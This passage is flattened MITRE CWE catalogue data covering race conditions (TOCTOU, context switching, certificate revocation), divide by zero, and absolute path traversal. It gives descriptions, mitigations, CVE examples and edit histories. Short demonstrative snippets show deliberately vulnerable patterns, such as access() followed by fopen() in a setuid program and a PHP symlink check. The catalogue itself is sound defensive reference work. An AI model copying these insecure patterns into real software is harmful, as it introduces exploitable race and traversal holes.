Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, References, Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Potential_Mitigations, References, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Yongchool Ryu, MathWorks; Roberto Bagnara, BUGSENG; Guido Persch, Imagix; John Blattner, Imagix; Paul Anderson, GrammaTech; Fulvio Baccaglini; John Viega; Robert Seacord; Members of the CWE-Research mailing list, including Jonathan Hood and Steve Grubb; Commenters on Twitter, including Patricia Aas, Myria, Richard Barrell, and others + 2022-03-31 + Many members of the CWE community contributed important feedback supporting deprecation of this entry. The contribution date reflects the first public request for comment; much feedback was received both before and after that date. + + Race Condition in Switch + + + + If two threads of execution use a resource simultaneously, there exists the possibility that resources may be used while invalid, in turn making the state of execution undefined. + + + + + + + + + + + + + + Implementation + + + Medium + + + Integrity + Other + Alter Execution Logic + Unexpected State + The main problem is that -- if a lock is overcome -- data could be altered in a bad state. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Use locking functionality. This is the recommended solution. Implement some form of locking mechanism around code which alters or reads persistent data in a multithreaded environment. + + + Architecture and Design + Create resource-locking validation checks. If no inherent locking mechanisms exist, use flags and signals to enforce your own blocking scheme when resources are being used by other threads of execution. + + + + + The following example demonstrates the weakness. + + int foo = 0;int storenum(int num) {static int counter = 0;counter++;if (num > foo) foo = num;return foo;} + + + public classRace { + static int foo = 0;public static void main() { + + new Threader().start();foo = 1; + }public static class Threader extends Thread { + + public void run() {System.out.println(foo);} + } + } + + + + + System Process + + + + Race condition within a thread + + + CON32-C + Prevent data races when accessing bit-fields from multiple threads + CWE More Abstract + + + CON40-C + Do not refer to an atomic variable twice in an expression + CWE More Abstract + + + CON43-C + Do not allow data races in multithreaded code + Exact + + + VNA02-J + Ensure that compound operations on shared variables are atomic + + + VNA03-J + Do not assume that a group of calls to independently atomic methods is atomic + + + SFP19 + Missing Lock + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product checks the state of a resource before using that resource, but the resource's state can change between the check and the use in a way that invalidates the results of the check. This can cause the product to perform invalid actions when the resource is in an unexpected state. + This weakness can be security-relevant when an attacker can influence the state of the resource between check and use. This can happen with shared resources such as files, memory, or even variables in multithreaded programs. + + + + + + + + + + TOCTTOU + The TOCTTOU acronym expands to "Time Of Check To Time Of Use". + + + TOCCTOU + The TOCCTOU acronym is most likely a typo of TOCTTOU, but it has been used in some influential documents, so the typo is repeated fairly frequently. + + + + + Implementation + + + Medium + + + Integrity + Other + Alter Execution Logic + Unexpected State + The attacker can gain access to otherwise unauthorized resources. + + + Integrity + Other + Modify Application Data + Modify Files or Directories + Modify Memory + Other + Race conditions such as this kind may be employed to gain read or write access to resources which are not normally readable or writable by the user in question. + + + Integrity + Other + Other + The resource in question, or other resources (through the corrupted one), may be changed in undesirable ways by a malicious user. + + + Non-Repudiation + Hide Activities + If a file or other resource is written in this method, as opposed to in a valid way, logging of the activity may not occur. + + + Non-Repudiation + Other + Other + In some cases it may be possible to delete files a malicious user might not otherwise have access to, such as log files. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + The most basic advice for TOCTOU vulnerabilities is to not perform a check before the use. This does not resolve the underlying issue of the execution of a function on a resource whose state and identity cannot be assured, but it does help to limit the false sense of security given by the check. + + + Implementation + When the file being altered is owned by the current user and group, set the effective gid and uid to that of the current user and group when executing this statement. + + + Architecture and Design + Limit the interleaving of operations on files from multiple processes. + + + Implementation + Architecture and Design + If you cannot perform operations atomically and you must share access to the resource between multiple processes or threads, then try to limit the amount of time (CPU cycles) between the check and use of the resource. This will not fix the problem, but it could make it more difficult for an attack to succeed. + + + Implementation + Recheck the resource after the use call to verify that the action was taken appropriately. + + + Architecture and Design + Ensure that some environmental locking mechanism can be used to protect resources effectively. + + + Implementation + Ensure that locking occurs before the check, as opposed to afterwards, such that the resource, as checked, is the same as it is when in use. + + + + + The following code checks a file, then updates its contents. + + struct stat *sb;...lstat("...",sb); // it has not been updated since the last time it was readprintf("stated file\n");if (sb->st_mtimespec==...){print("Now updating things\n");updateThings();} + + Potentially the file could have been updated between the time of the check and the lstat, especially since the printf has latency. + + + The following code is from a program installed setuid root. The program performs certain file operations on behalf of non-privileged users, and uses access checks to ensure that it does not use its root privileges to perform operations that should otherwise be unavailable the current user. The program uses the access() system call to check if the person running the program has permission to access the specified file before it opens the file and performs the necessary operations. + + if(!access(file,W_OK)) {f = fopen(file,"w+");operate(f);...}else { + + fprintf(stderr,"Unable to open file %s.\n",file); + } + + The call to access() behaves as expected, and returns 0 if the user running the program has the necessary permissions to write to the file, and -1 otherwise. However, because both access() and fopen() operate on filenames rather than on file handles, there is no guarantee that the file variable still refers to the same file on disk when it is passed to fopen() that it did when it was passed to access(). If an attacker replaces file after the call to access() with a symbolic link to a different file, the program will use its root privileges to operate on the file even if it is a file that the attacker would otherwise be unable to modify. By tricking the program into performing an operation that would otherwise be impermissible, the attacker has gained elevated privileges. This type of vulnerability is not limited to programs with root privileges. If the application is capable of performing any operation that the attacker would not otherwise be allowed perform, then it is a possible target. + + + This code prints the contents of a file if a user has permission. + + function readFile($filename){ + $user = getCurrentUser(); + + //resolve file if its a symbolic link + if(is_link($filename)){$filename = readlink($filename);} + if(fileowner($filename) == $user){echo file_get_contents($realFile);return;}else{echo 'Access denied';return false;} + } + + This code attempts to resolve symbolic links before checking the file and printing its contents. However, an attacker may be able to change the file from a real file to a symbolic link between the calls to is_link() and file_get_contents(), allowing the reading of arbitrary files. Note that this code fails to log the attempted access (CWE-778). + + + This example is adapted from [REF-18]. Assume that this code block is invoked from multiple threads. The switch statement will execute different code depending on the time when MYFILE.txt was last changed. + + + #include <sys/types.h> + #include <sys/stat.h> + + ... + + struct stat sb; + stat("MYFILE.txt",&sb); + printf("file change time: %d\n",sb->st_ctime); + switch(sb->st_ctime % 2){ + case 0: printf("Option 1\n"); break; + case 1: printf("Option 2\n"); break; + default: printf("this should be unreachable?\n"); break; + } + + + If this code block were executed within multiple threads, and MYFILE.txt changed between the operation of one thread and another, then the switch could produce different, possibly unexpected results. + + + + + CVE-2015-1743 + TOCTOU in sandbox process allows installation of untrusted browser add-ons by replacing a file after it has been verified, but before it is executed + https://www.cve.org/CVERecord?id=CVE-2015-1743 + + + CVE-2003-0813 + A multi-threaded race condition allows remote attackers to cause a denial of service (crash or reboot) by causing two threads to process the same RPC request, which causes one thread to use memory after it has been freed. + https://www.cve.org/CVERecord?id=CVE-2003-0813 + + + CVE-2004-0594 + PHP flaw allows remote attackers to execute arbitrary code by aborting execution before the initialization of key data structures is complete. + https://www.cve.org/CVERecord?id=CVE-2004-0594 + + + CVE-2008-2958 + chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks. + https://www.cve.org/CVERecord?id=CVE-2008-2958 + + + CVE-2008-1570 + chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks. + https://www.cve.org/CVERecord?id=CVE-2008-1570 + + + + + Time-of-check Time-of-use race condition + + + File Access Race Conditions: TOCTOU + + + Time of check, time of use race condition + + + Race condition in switch + + + FIO01-C + Be careful using functions that use file names for identification + + + SFP20 + Race Condition Window + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + TOCTOU issues do not always involve symlinks, and not every symlink issue is a TOCTOU problem. + Non-symlink TOCTOU issues are not reported frequently, but they are likely to occur in code that attempts to be secure. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Alternate_Terms, Observed_Examples, Other_Notes, References, Relationship_Notes, Relationships, Research_Gaps + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2009-07-27 + updated White_Box_Definitions + + + CWE Content Team + MITRE + 2010-09-27 + updated Description, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Alternate_Terms, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Time-of-check Time-of-use Race Condition + + + + A product performs a series of non-atomic actions to switch between contexts that cross privilege or other security boundaries, but a race condition allows an attacker to modify or misrepresent the product's behavior during the switch. + This is commonly seen in web browser vulnerabilities in which the attacker can perform certain actions while the browser is transitioning from a trusted to an untrusted domain, or vice versa, and the browser performs the actions on one domain using the trust level and resources of the other domain. + + + + + + + Primary + This weakness can be primary to almost anything, depending on the context of the race condition. + + + Resultant + This weakness can be resultant from insufficient compartmentalization (CWE-653), incorrect locking, improper initialization or shutdown, or a number of other weaknesses. + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Confidentiality + Modify Application Data + Read Application Data + + + + + CVE-2009-1837 + Chain: race condition (CWE-362) from improper handling of a page transition in web client while an applet is loading (CWE-368) leads to use after free (CWE-416) + https://www.cve.org/CVERecord?id=CVE-2009-1837 + + + CVE-2004-2260 + Browser updates address bar as soon as user clicks on a link instead of when the page has loaded, allowing spoofing by redirecting to another page using onUnload method. ** this is one example of the role of "hooks" and context switches, and should be captured somehow - also a race condition of sorts ** + https://www.cve.org/CVERecord?id=CVE-2004-2260 + + + CVE-2004-0191 + XSS when web browser executes Javascript events in the context of a new page while it's being loaded, allowing interaction with previous page in different domain. + https://www.cve.org/CVERecord?id=CVE-2004-0191 + + + CVE-2004-2491 + Web browser fills in address bar of clicked-on link before page has been loaded, and doesn't update afterward. + https://www.cve.org/CVERecord?id=CVE-2004-2491 + + + + + Context Switching Race Condition + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Can overlap signal handler race conditions. + Under-studied as a concept. Frequency unknown; few vulnerability reports give enough detail to know when a context switching race condition is a factor. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Other_Notes, Relationship_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-12-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product divides a value by zero. + This weakness typically occurs when an unexpected value is provided to the product, or if an error occurs that is not properly detected. It frequently occurs in calculations involving physical dimensions such as size, length, width, and height. + + + + + + + + + Implementation + + + Medium + + + Availability + DoS: Crash, Exit, or Restart + A Divide by Zero results in a crash. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + + + The following Java example contains a function to compute an average but does not validate that the input value used as the denominator is not zero. This will create an exception for attempting to divide by zero. If this error is not handled by Java exception handling, unexpected results can occur. + + public int computeAverageResponseTime (int totalTime, int numRequests) {return totalTime / numRequests;} + + By validating the input value used as the denominator the following code will ensure that a divide by zero error will not cause unexpected results. The following Java code example will validate the input value, output an error message, and throw an exception. + + public int computeAverageResponseTime (int totalTime, int numRequests) throws ArithmeticException {if (numRequests == 0) {System.out.println("Division by zero attempted!");throw ArithmeticException;}return totalTime / numRequests;} + + + + The following C/C++ example contains a function that divides two numeric values without verifying that the input value used as the denominator is not zero. This will create an error for attempting to divide by zero, if this error is not caught by the error handling capabilities of the language, unexpected results can occur. + + double divide(double x, double y){return x/y;} + + By validating the input value used as the denominator the following code will ensure that a divide by zero error will not cause unexpected results. If the method is called and a zero is passed as the second argument a DivideByZero error will be thrown and should be caught by the calling block with an output message indicating the error. + + const int DivideByZero = 10;double divide(double x, double y){if ( 0 == y ){throw DivideByZero;}return x/y;}...try{divide(10, 0);}catch( int i ){if(i==DivideByZero) {cerr<<"Divide by zero error";}} + + + + + + + The following C# example contains a function that divides two numeric values without verifying that the input value used as the denominator is not zero. This will create an error for attempting to divide by zero, if this error is not caught by the error handling capabilities of the language, unexpected results can occur. + + int Division(int x, int y){return (x / y);} + + The method can be modified to raise, catch and handle the DivideByZeroException if the input value used as the denominator is zero. + + int SafeDivision(int x, int y){try{return (x / y);}catch (System.DivideByZeroException dbz){System.Console.WriteLine("Division by zero attempted!");return 0;}} + + + + + + + + + CVE-2007-3268 + Invalid size value leads to divide by zero. + https://www.cve.org/CVERecord?id=CVE-2007-3268 + + + CVE-2007-2723 + "Empty" content triggers divide by zero. + https://www.cve.org/CVERecord?id=CVE-2007-2723 + + + CVE-2007-2237 + Height value of 0 triggers divide by zero. + https://www.cve.org/CVERecord?id=CVE-2007-2237 + + + + + A9 + Denial of Service + CWE More Specific + + + FLP03-C + Detect and handle floating point errors + + + INT33-C + Ensure that division and remainder operations do not result in divide-by-zero errors + Exact + + + NUM02-J + Ensure that division and modulo operations do not result in divide-by-zero errors + + + SFP1 + Glitch in computation + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2008-04-11 + Draft 9 + 2008-04-11 + Submitted by members of the CWE community to extend early CWE versions + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product accepts input in the form of a slash absolute path ('/absolute/pathname/here') without appropriate validation, which can allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + High + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-1345 + Multiple FTP clients write arbitrary files via absolute paths in server responses + https://www.cve.org/CVERecord?id=CVE-2002-1345 + + + CVE-2001-1269 + ZIP file extractor allows full path + https://www.cve.org/CVERecord?id=CVE-2001-1269 + + + CVE-2002-1818 + Path traversal using absolute pathname + https://www.cve.org/CVERecord?id=CVE-2002-1818 + + + CVE-2002-1913 + Path traversal using absolute pathname + https://www.cve.org/CVERecord?id=CVE-2002-1913 + + + CVE-2005-2147 + Path traversal using absolute pathname + https://www.cve.org/CVERecord?id=CVE-2005-2147 + + + CVE-2000-0614 + Arbitrary files may be overwritten via compressed attachments that specify absolute path names for the decompressed output. + https://www.cve.org/CVERecord?id=CVE-2000-0614 + + + + + /absolute/pathname/here + + + FIO05-C + Identify files using multiple file attributes + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Slash Absolute Path - /absolute/pathname/here + + + + The product does not check the revocation status of a certificate after its initial revocation check, which can cause the product to perform privileged actions even after the certificate is revoked at a later time. + If the revocation status of a certificate is not checked before each action that requires privileges, the system may be subject to a race condition. If a certificate is revoked after the initial check, all subsequent actions taken with the owner of the revoked certificate will lose all benefits guaranteed by the certificate. In fact, it is almost certain that the use of a revoked certificate indicates malicious activity. + + + + + + + + + + + + + Implementation + + + Medium + + + Access Control + Gain Privileges or Assume Identity + Trust may be assigned to an entity who is not who it claims to be. + + + Integrity + Modify Application Data + Data from an untrusted (and possibly malicious) source may be integrated. + + + Confidentiality + Read Application Data + Data may be disclosed to an entity impersonating a trusted entity, resulting in information disclosure. + + + + + Architecture and Design + Ensure that certificates are checked for revoked status before each use of a protected resource. If the certificate is checked before each access of a protected resource, the delay subject to a possible race condition becomes almost negligible and significantly reduces the risk associated with this issue. + + + + + The following code checks a certificate before performing an action. + + if (cert = SSL_get_peer_certificate(ssl)) { + foo=SSL_get_verify_result(ssl);if (X509_V_OK==foo) + + + //do stuff + foo=SSL_get_verify_result(ssl); + //do more stuff without the check. + + + + + + + + While the code performs the certificate verification before each action, it does not check the result of the verification after the initial attempt. The certificate may have been revoked in the time between the privileged actions. + + + + + Race condition in checking for certificate revocation + + + SFP20 + Race Condition Window + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Name, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Modes_of_Introduction, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Race Condition in Checking for Certificate Revocation + + + + The product does not properly determine which state it is in, causing it to assume it is in state X when in fact it is in state Y, causing it to perform incorrect operations in a security-relevant manner. + + + + + + + + + Implementation + + + + + Integrity + Other + Varies by Context + Unexpected State + + + + + Incomplete Internal State Distinction + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This conceptually overlaps other categories such as insufficient verification, but this entry refers to the product's incorrect perception of its own state. + This is probably resultant from other weaknesses such as unhandled error conditions, inability to handle out-of-order steps, multiple interpretation errors, etc. + This entry is being considered for deprecation. It was poorly-defined in PLOVER and is not easily described using the behavior/resource/property model of vulnerability theory. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2018-03-27 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This entry was deprecated because it overlapped the same concepts as race condition (CWE-362) and Improper Synchronization (CWE-662). + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-12 + Critical + Deprecated entry + + + CWE Content Team + MITRE + 2010-12-13 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, 